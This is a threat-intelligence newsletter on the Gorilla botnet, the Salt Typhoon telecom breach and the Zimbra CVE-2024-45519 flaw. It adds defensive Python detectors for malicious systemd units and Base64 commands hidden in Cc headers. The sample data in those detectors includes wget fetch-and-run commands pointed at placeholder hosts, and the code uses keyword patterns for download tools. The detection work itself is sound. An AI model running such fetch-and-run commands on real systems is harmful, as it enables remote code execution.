10 October 2024

Ankura CTIX FLASH Update - October 8, 2024

Ankura Consulting Group LLC


Ransomware/Malware Activity

New Gorilla Botnet Issues Over 300,000 DDoS Attacks

Cybersecurity researchers have identified a new botnet family called "Gorilla Botnet" that was particularly active through the month of September. The botnet issued over 300,000 attack commands targeting over 100 countries, although most of the attacks were directed at the U.S., China, Canada, and Germany. Targets allegedly included universities, governments, telecommunications companies, banks, and the gaming industry. Researchers determined that the botnet relied heavily on User Datagram Protocol (UDP) floods as its preferred attack method, followed by ACK Bypass Flood and VSE Flood methods.

The botnet can carry out many different types of attacks and uses encryption algorithms similar to those employed by the Keksec group to hide key information, suggesting that the attackers behind this campaign could be related to Keksec. Examination of Gorilla Botnet's source code indicates that it is a variant of the leaked Mirai botnet. The infection supports multiple CPU architectures, connects to one of five predefined command-and-control (C2) servers, and embeds functions to exploit a security flaw in Apache Hadoop YARN RPC to achieve remote code execution.

The botnet maintains persistence by creating a service file named "custom.service" within the "/etc/systemd/system/" directory, configured to run automatically at system startup. This service downloads a shell script "lol.sh" from the remote server "pen[.]gorillafirewall[.]su" to the "/tmp/" directory, sets execution permissions, and executes the script. Denial-of-Service (DoS) attacks continue to be one of the most prevalent cybersecurity threats. CTIX analysts recommend that organizations implement controls to mitigate the risk posed by DoS attacks. CTIX analysts will continue to report on new and emerging forms of malware and associated campaigns.
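As an added example (not Gorilla Botnet code and not Ankura's tooling), the following Python script audits systemd service units for the persistence pattern described above: an ExecStart line that downloads from a remote host, runs something out of /tmp, and is enabled at boot. The sample unit text and its hostname are constructed placeholders.

```python
"""Audit systemd units for the persistence pattern described above.
Added example, not Gorilla Botnet code: flags units whose ExecStart* lines
download from a remote host or run from /tmp, and notes boot enablement.
The sample unit is constructed; its hostname is a placeholder."""
import configparser
import re
from pathlib import Path

DOWNLOADER = re.compile(r"\b(curl|wget)\b")
REMOTE_URL = re.compile(r"https?://[^\s'\"]+")
TMP_PATH = re.compile(r"/tmp/[^\s;&|'\"]+")

def audit_unit(text: str, name: str = "<unit>") -> list[str]:
    """Return findings for one unit file's contents (empty list = nothing flagged)."""
    cp = configparser.ConfigParser(strict=False, interpolation=None)  # tolerate repeated keys, keep % specifiers
    cp.optionxform = str  # keep key case (ExecStart, not execstart)
    try:
        cp.read_string(text)
    except configparser.Error as exc:
        return [f"{name}: unparsable unit ({exc})"]
    if not cp.has_section("Service"):
        return []
    findings = []
    for key in ("ExecStartPre", "ExecStart", "ExecStartPost"):
        cmd = cp["Service"].get(key, "")
        url, tmp = REMOTE_URL.search(cmd), TMP_PATH.search(cmd)
        if DOWNLOADER.search(cmd) and url:
            findings.append(f"{name}: {key} downloads from {url.group(0)}")
        if tmp:
            findings.append(f"{name}: {key} references {tmp.group(0)}")
    wanted = cp["Install"].get("WantedBy", "") if cp.has_section("Install") else ""
    if findings and "multi-user.target" in wanted:
        findings.append(f"{name}: enabled at boot via WantedBy={wanted}")
    return findings

def audit_directory(unit_dir: str = "/etc/systemd/system") -> dict[str, list[str]]:
    results = {}  # only units that produced findings
    for path in Path(unit_dir).glob("*.service"):
        hits = audit_unit(path.read_text(errors="replace"), path.name)
        if hits:
            results[path.name] = hits
    return results

# Constructed sample resembling the described custom.service (placeholder host).
SAMPLE_UNIT = """[Service]
ExecStart=/bin/sh -c 'wget http://c2.example.invalid/lol.sh -O /tmp/lol.sh; chmod +x /tmp/lol.sh; /tmp/lol.sh'
[Install]
WantedBy=multi-user.target
"""
```

Run `audit_directory()` as root on a host to list every service unit that matches; legitimate units that fetch from /tmp are rare enough that each hit deserves a look.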

Threat Actor Activity

Chinese Hackers Breach Broadband Providers to Target U.S. Government's Wiretap System

As an update to our September 27 Flash Threat Actor report, more recent developments have revealed that the Chinese hacking group "Salt Typhoon" breached the networks of major U.S. broadband providers, including Verizon, AT&T, and Lumen Technologies. The hackers allegedly accessed systems used by the U.S. federal government for court-authorized wiretaps, potentially maintaining this access for months to collect intelligence. The Wall Street Journal, citing anonymous sources, reported the breach and noted that the hackers might have engaged in extensive data collection from internet service providers serving millions of Americans.

Salt Typhoon, also known as Earth Estries and Ghost Emperor, has been active since at least 2019. The group typically targets government entities and telecommunications companies, primarily in Southeast Asia, but has also attacked organizations across multiple countries, including Brazil, Canada, and the UK. The group's sophisticated methods often involve exploiting vulnerabilities in software, such as the ProxyLogon flaws in Microsoft Exchange Server, and deploying custom backdoors and rootkits. The U.S. government and private sector security experts are actively investigating the breach's impact, including the type and volume of data accessed.

This incident is part of a broader pattern of cyber espionage by Chinese state-backed actors targeting U.S. and European networking devices and ISPs. Notably, these groups often share infrastructure and tools, indicating coordinated efforts under a common umbrella. Despite the serious implications, Chinese authorities have dismissed the allegations, accusing the U.S. of fabricating narratives to blame China. The ongoing investigation seeks to determine the initial access method used by the hackers, with Cisco routers being one potential vector under scrutiny, though no direct evidence has yet implicated Cisco equipment in the breach. CTIX analysts will continue reporting about ongoing cybersecurity activity amongst threat actors.

Vulnerabilities

CISA Adds Critical Synacor Zimbra Vulnerability to the Known Exploited Vulnerabilities Catalog

The Zimbra Collaboration platform is currently facing active exploitation attempts targeting a critical vulnerability, allowing unauthenticated attackers to execute arbitrary commands through a flaw in its postjournal service. Discovered by researcher Alan Li and assigned a CVSS score of 10, the vulnerability, tracked as CVE-2024-45519, was addressed in Zimbra's September 2024 updates for versions 8.8.15 Patch 46, 9.0.0 Patch 41, 10.0.9, and 10.1.1. The attacks began on September 28, 2024, after Project Discovery disclosed technical details and proof-of-concept (PoC) exploit code.

Threat actors exploit the flaw by sending spoofed Gmail emails with Base64-encoded commands in the CC fields, which Zimbra servers parse and execute. This approach has been used to deploy web shells on vulnerable servers, allowing further control and execution of commands. The U.S. Cybersecurity and Infrastructure Security Agency (CISA) has since added the flaw to its Known Exploited Vulnerabilities (KEV) catalog, citing the risk it poses to federal and private systems. CISA has mandated that all Federal Civilian Executive Branch (FCEB) agencies remediate the issue by no later than October 24, 2024, and recommends private organizations apply the patches as well. While the attacks are ongoing, the responsible threat actors remain unidentified. For systems where immediate patching is not feasible, temporarily removing the postjournal service has been suggested to mitigate potential risks. CTIX analysts recommend that affected users follow the guidance in the KEV to prevent exploitation.
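As an added example (not Zimbra code and not the published PoC), the following Python screen flags inbound messages whose CC header carries shell metacharacters or a Base64 token that decodes to shell-like text, the delivery pattern described above. The sample message is constructed, and its Base64 local part is built at run time from harmless text pointing at a reserved .invalid host.

```python
"""Screen message headers for the Cc delivery pattern described for CVE-2024-45519.
Added example, not Zimbra code or the published PoC: flags Cc header values that
carry shell metacharacters or a Base64 token decoding to shell-like ASCII.
The sample message is constructed and points at a reserved .invalid host."""
import base64
import re
from email import message_from_string

SHELL_META = re.compile(r"\$\(|`|\|\s*(sh|bash)\b")  # $( ... ), backticks, "| sh"
B64_TOKEN = re.compile(r"[A-Za-z0-9+/]{12,}={0,2}")  # candidate Base64 runs
SHELL_WORDS = re.compile(r"\b(sh|bash|curl|wget|chmod)\b")

def decoded_shell_text(token: str) -> "str | None":
    """Return the decoded text if token is valid Base64 for printable, shell-like ASCII."""
    try:
        text = base64.b64decode(token, validate=True).decode("ascii")
    except ValueError:  # bad alphabet/padding (binascii.Error) or non-ASCII bytes
        return None
    if text.isprintable() and SHELL_WORDS.search(text):
        return text
    return None

def screen_cc_headers(raw_message: str) -> list[str]:
    """Return one finding per suspicious Cc header value (empty list = nothing flagged)."""
    msg = message_from_string(raw_message)
    findings = []
    for value in msg.get_all("Cc", []):
        if SHELL_META.search(value):
            findings.append(f"shell metacharacters in Cc: {value.strip()}")
        for token in B64_TOKEN.findall(value):
            decoded = decoded_shell_text(token)
            if decoded:
                findings.append(f"Base64 in Cc decodes to shell-like text: {decoded!r}")
    return findings

# Constructed sample: the Base64 local part is built at run time from harmless text
# that merely looks like a download command, aimed at a reserved .invalid host.
_token = base64.b64encode(b"wget http://example.invalid/lol.sh").decode()
SAMPLE_MESSAGE = (
    "From: sender@example.invalid\r\n"
    "To: user@mail.example.invalid\r\n"
    f"Cc: {_token}@mail.example.invalid\r\n"
    "Subject: constructed sample\r\n\r\nbody\r\n"
)
```

This is a mail-gateway or log-review heuristic, not a substitute for applying the patched versions listed above or for removing the postjournal service where patching must wait.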
